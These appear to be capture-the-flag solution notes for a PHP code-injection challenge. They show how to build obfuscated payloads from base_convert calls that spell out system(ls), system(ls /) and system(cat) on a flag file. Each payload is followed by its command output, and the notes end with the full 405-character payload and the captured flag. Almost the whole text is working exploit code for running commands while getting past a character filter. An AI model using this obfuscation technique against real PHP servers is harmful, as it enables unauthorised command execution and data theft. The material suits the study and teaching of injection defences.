*FIRST: system(ls)
	system():					base_convert(1751504350,10,36)()
	ls:						base_convert(784,10,36)
RESULT:
= index.php index.php


*NEXT: system(ls /)
	system(:					base_convert(1751504350,10,36)(
	ls:						base_convert(784,10,36)
	space:						.base_convert(16191,10,36)(32)
	/):						.base_convert(16191,10,36)(47))
RESULT:
= bin boot dev etc flag_a2647e5eb8e9e767fe298aa012a49b50 home lib lib64 media mnt opt proc root run sbin srv sys tmp usr var var


*NEXT: system(cat /flag_a2647e5eb8e9e767fe298aa012a49b50)
	system(:					base_convert(1751504350,10,36)(
	cat:						base_convert(15941,10,36)
	space:						.base_convert(16191,10,36)(32)
	/:						.base_convert(16191,10,36)(47)
	flag:						.base_convert(727432,10,36)
	_:						.base_convert(16191,10,36)(95)
	a2647e5eb8e9e767fe298aa012a49b50):		.base_convert(788365066082,10,36)
							.base_convert(880282369231,10,36)
							.base_convert(1206073849608,10,36)
							.base_convert(38,10,36)
							.base_convert(16191,10,36)(97)
							.base_convert(153,10,36)
							.base_convert(16191,10,36)(98)
							.base_convert(180,10,36))
payload: 405 chars
base_convert(1751504350,10,36)(base_convert(15941,10,36).base_convert(16191,10,36)(32).base_convert(16191,10,36)(47).base_convert(727432,10,36).base_convert(16191,10,36)(95).base_convert(788365066082,10,36).base_convert(880282369231,10,36).base_convert(1206073849608,10,36).base_convert(38,10,36).base_convert(16191,10,36)(97).base_convert(153,10,36).base_convert(16191,10,36)(98).base_convert(180,10,36))

RESULT:
= flag{d0_y0u_kn0w_th1s_15_a_rea1_w0rld_cha11enge} flag{d0_y0u_kn0w_th1s_15_a_rea1_w0rld_cha11enge}